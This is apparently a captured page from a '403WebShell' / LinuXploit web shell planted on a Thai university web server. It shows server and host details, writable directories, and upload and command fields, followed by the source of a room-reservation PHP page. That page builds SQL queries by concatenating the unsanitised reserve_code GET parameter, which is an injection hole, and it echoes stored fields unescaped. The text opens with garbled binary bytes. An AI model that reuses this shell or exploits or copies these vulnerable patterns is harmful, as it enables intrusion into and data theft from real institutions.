h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/trr/pages/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/trr/pages/reserve_detail.php
<?php session_start();?>
<?php include 'check_mode_login.php';?>
<?php include 'dbconnect.php';?>
<?php include 'header.php';?>

<?php
$pagetitle_text = "ข้อมูลการจอง";
$num_show_day = 31;
//$submit_password = (isset($_POST["submit_password"])) ? $_POST["submit_password"] : '';
?>
<style type="text/css">
<!--
.style2 {color: #3366FF}
-->
</style>
		  
	<h1 class="page-header"><?php echo $pagetitle_text;?></h1>
<?php
$reserve_code = (isset($_GET["reserve_code"])) ? $_GET["reserve_code"] : '';
$sqlx = "SELECT * FROM reserve_detail WHERE reserve_code=" . $reserve_code;
$queryx = mysqli_query($conn,$sqlx);	
if($resultx=mysqli_fetch_array($queryx,MYSQLI_ASSOC)) { //เจอ reserve_code มั้ย
	if ($resultx["user_name"] == $_SESSION['USERNAME_arit67']) { //user ตรงมั้ย
?>
		<form action="reserve_edit.php" method="post" name="form1" id="form1">
			<table class="table table-striped table-bordered table-hover">
				<tbody>
					<tr>
						<td width="30%">เลขที่การจอง</td>
						<td>
							<?php echo $reserve_code;?>
						</td>
					</tr>
					<tr>
						<td width="30%">ชื่อผู้จอง</td>
						<td><?php echo $resultx["full_name"];?></td>
					</tr>
					<tr>
						<td width="30%">สังกัดคณะ/หน่วยงาน</td>
						<td><?php echo $resultx["faculty_name"];?></td>
					</tr>	
					<tr>
						<td width="30%">อีเมล</td>
						<td><?php echo $resultx["email"];?></td>
					</tr>													
					<tr>
						<td width="30%">ห้อง</td>
						<td>
	<?php
		$sql = "SELECT room_name FROM reserve_room WHERE room_code=" . $resultx["room_code"];
		$query = mysqli_query($conn,$sql);	
		if($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
		{
			echo $result["room_name"] . " <font color=green>(ไม่สามารถแก้ไขห้องที่จองได้ ถ้าต้องการเปลี่ยนห้องที่จองกรุณาลบการจองนี้แล้วทำการจองใหม่)</font>";
		} else {
			echo "ไม่พบห้องที่เลือก";
		}
	?>							
						</td>
					</tr>
					<tr>
						<td width="30%">วันที่ต้องการจอง (จองล่วงหน้าได้ไม่เกิน 31 วัน)</td>
						<td>
	<?php
		$input_date = date('d/m/Y',strtotime($resultx["reserve_date"]));
		echo $input_date . " <font color=green>(ไม่สามารถแก้ไขวันที่จองได้ ถ้าต้องการเปลี่ยนวันที่จองกรุณาลบการจองนี้แล้วทำการจองใหม่)</font>";
	?>						
						</td>
					</tr>
					<tr>												
					  <td width="30%">เวลาที่ต้องการจอง (เลือกได้หลายช่วงเวลา)</td>
						<td>
							<div class="form-group">
								<div class="checkbox">
	<?php
		$sql = "SELECT * FROM reserve_time_list ORDER BY time_code ASC";
		$query = mysqli_query($conn,$sql);	
		while($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
		{
			$input_name = "pid" . $result["time_code"];
			$input_id = "pid" . $result["time_code"];
			$sql2 = "SELECT reserve_time.reserve_code FROM reserve_detail INNER JOIN reserve_time ON reserve_detail.reserve_code= reserve_time.reserve_code WHERE ( (reserve_detail.reserve_date ='" . $resultx["reserve_date"] . "'" .  ") AND (reserve_detail.room_code=" . $resultx["room_code"] . ") AND (reserve_time.reserve_time =" . $result["time_code"] . ") )";
			$query2 = mysqli_query($conn,$sql2);	
			if($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC)) {
				if($result2["reserve_code"] == $reserve_code) {
	?> 
									<div class="checkbox">
										<label>
											<input name="<?php echo $input_name;?>" type="checkbox" id="<?php echo $input_id;?>" value="<?php echo $result["time_code"];?>" checked="checked" disabled="disabled"> 
											<?php echo $result["start_time"] . "-" . $result["stop_time"] . " (ว่าง)";?>
										</label>
									</div>		
	<?php			
				
				} else { //if($result2["reserve_code"] == $reserve_code) {
	?> 
									<div class="checkbox">
										<label>
											<input type="checkbox" disabled="disabled"> 
											<?php echo $result["start_time"] . "-" . $result["stop_time"] . "<font color=red> (ไม่ว่าง)</font>";?>
										</label>
									</div>			
	<?php			
				} //if($result2["reserve_code"] == $reserve_code) {
			} else { //if($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC)) {
	?>								
									<div class="checkbox">
										<label>
											<input name="<?php echo $input_name;?>" type="checkbox" id="<?php echo $input_id;?>" value="<?php echo $result["time_code"];?>" disabled="disabled"> 
											<?php echo $result["start_time"] . "-" . $result["stop_time"] . " (ว่าง)";?>
										</label>
									</div>
	<?php
			} //if($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC)) {
		} //while($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
	?>								
								</div>
							</div>
						</td>
					</tr>												
					<tr>
						<td width="30%">หัวข้อ / วิชา</td>
						<td>
							<div class="form-group">
								<input name="subject" id="subject" class="form-control"  value="<?php echo $resultx["subject"];?>" disabled="disabled">
							</div>
						</td>
					</tr>	
					<!--<tr>
						<td width="30%">จำนวนคน</td>
						<td>
							<div class="form-group">
								<input type="number" name="num_student" id="num_student" class="form-control" value="<?php //echo $resultx["num_student"];?>" disabled="disabled">
							</div>
						</td>
					</tr>-->
					<tr>
						<td width="30%">หมายเลขโทรศัพท์ผู้จอง</td>
						<td>
							<div class="form-group">
								<input name="phone" id="phone" class="form-control" value="<?php echo $resultx["phone"];?>" disabled="disabled">
							</div>
						</td>
					</tr>						
					<tr>
						<td width="30%">รายละเอียดอื่นๆ</td>
						<td>
											<div class="form-group">
												<textarea class="form-control" rows="3" name="note" id="note" disabled="disabled"><?php echo $resultx["note"];?></textarea>
											</div>
						</td>
					</tr>
	
				</tbody>
		  </table>
		  
	
											<div class="form-group">
												<input type="hidden" name="reserve_code" id="reserve_code" value="<?php echo $reserve_code;?>" />
												<!--<input type="hidden" name="password_check" id="password_check" value="<?php //echo $password_check;?>" />-->										
												<input name="submit_edit" type="submit" id="submit_edit" value="คลิกที่นี่เพื่อแก้ไขข้อมูลการจองนี้" class="btn btn-success">
												&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;	
												<input name="submit_delete" type="submit" id="submit_delete" value="คลิกที่นี่เพื่อลบการจองนี้" class="btn btn-danger">											
												&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
												<a href="index.php"><button type="button" class="btn btn-warning">กลับหน้ารายการ</button></a>
											</div>	
		</form>	
<?php
	} else { //if ($result["user_name"] == $_SESSION['USERNAME_arit67']) { //user ตรงมั้ย
?>
		<h1><font color="#FF0000">ไม่สามารถดูรายละเอียดการจองได้ ผู้ที่ทำการจองเท่านั้นที่จะดูรายละเอียดการจองได้</font></h1>
<?php
	} //if ($result["user_name"] == $_SESSION['USERNAME_arit67']) { //user ตรงมั้ย
} else { //if($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
?>
	<h1><font color="#FF0000">ไม่พบข้อมูลการจอง</font></h1>
<?php
} //if($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
?>	

<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit